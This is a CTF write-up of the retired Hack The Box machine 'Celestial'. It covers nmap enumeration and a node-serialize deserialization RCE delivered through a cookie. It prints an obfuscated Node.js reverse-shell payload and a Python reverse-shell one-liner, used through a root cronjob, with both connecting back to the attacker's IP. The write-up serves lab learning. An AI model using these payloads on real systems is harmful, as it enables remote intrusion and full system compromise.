HTB-Calestial Writeup

Hello Guys, this is calestial, this machine has been retired a few weeks ago but I just had to write it.
Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated. Some of them simulating real world scenarios and some of them leaning more towards a CTF style of challenge.
ok let's start it,
Enumerations
Target IP : 10.10.10.85 (Calestial)
let's look at the information obtained by nmap
root@kali:~# nmap -sC -sV 10.10.10.85Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2018–09–04 03:32 WIB
Nmap scan report for 10.10.10.85
Host is up (0.24s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3000/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (text/html; charset=utf-8).Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.48 seconds
On the machine there are only a few services running, we will focus on nodejs and how to exploit them.
How Does Node.js Work?
Unlike the server-side programming language in general, which is blocking, Node.js is non-blocking, as does JavaScript work. Node.js runs event-driven. The purpose of Blocking is simply, that a program code will be run until it is complete, and then switch to the next program code.
As we can see, this machine only runs nodejs server, let's see what the web browser looks like.


On the opsecx blog talking about exploiting a RCE (Remote Code Execution) bug in a nodejs module called node-serialize. The blog post explains pretty clearly what’s wrong with the module.
What we will do next is to do the proxy intercept using BurpSuite to see how the request and the response work, BurpSuite is a very powerful tool we can do many things with it.

This example web app is setting a cookie with the user profile, which is a serialised object using the vulnerable node module. This is all encoded in base64. To get an idea what the base64 string looks when unpacked we can get to utilise the Encoder.

This looks like standard JSON. For successful exploitation, arbitrary code execution should occur when untrusted input is passed into unserialize() function. The best way to create a payload is to use the serialize() function of the same module.
I Found the following JavaScript object and passed it to serialize() function to create a payload.
var y = {
rce : function(){},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
if we run this script in the terminal it will be like this :
root@kali:~/tools/nodejs# node log.js
Serialized:
{"rce":"_$$ND_FUNC$$_function(){\n\n}"}We can create a shellcode by generating using nodejsshell which I found on github. after shellcode is generated we can insert it into the RCE function().
Exploitation
here is how to generate shellcode :
My IP : 10.10.14.225 and i use port 430

After shellcode is generated we can insert it into the RCE function looks like this :
root@kali:~/tools/nodejs# cat log.js
var y = {
rce : function(){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,48,46,49,48,46,49,52,46,50,50,53,34,59,10,80,79,82,84,61,34,52,51,48,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))},
}
And we run it to Serialize the Code.

Then we encode with base64 using Burpsuite.

Do not forget to add characters '()' at the end of shellcode and put before the character ' "} ', because this won’t work if we forget to add it. then we encode it into Base64 encoding and we paste it into cookie profile :

Before submitting a request from Burpsuite, we first run netcat to capture the connection on port 430 as we made it.

Forward the request from Burpsuite and we got the shell as user sun!. after it doing enumerations again to see what services are running on this machine and getting user.txt .
Privilege Escalation
in this limited shell session I can't do the sudo -l command because I don't have a user sun password. but I use another way to see jobs that can be run as root. and I found cronjob at /home/sun/Documents/script.py

Then I made a python reverse shell like this to get the shell session as root.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.225",431));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'And Tadaaaa! we got shell session as Root.


See You again. Byeee!
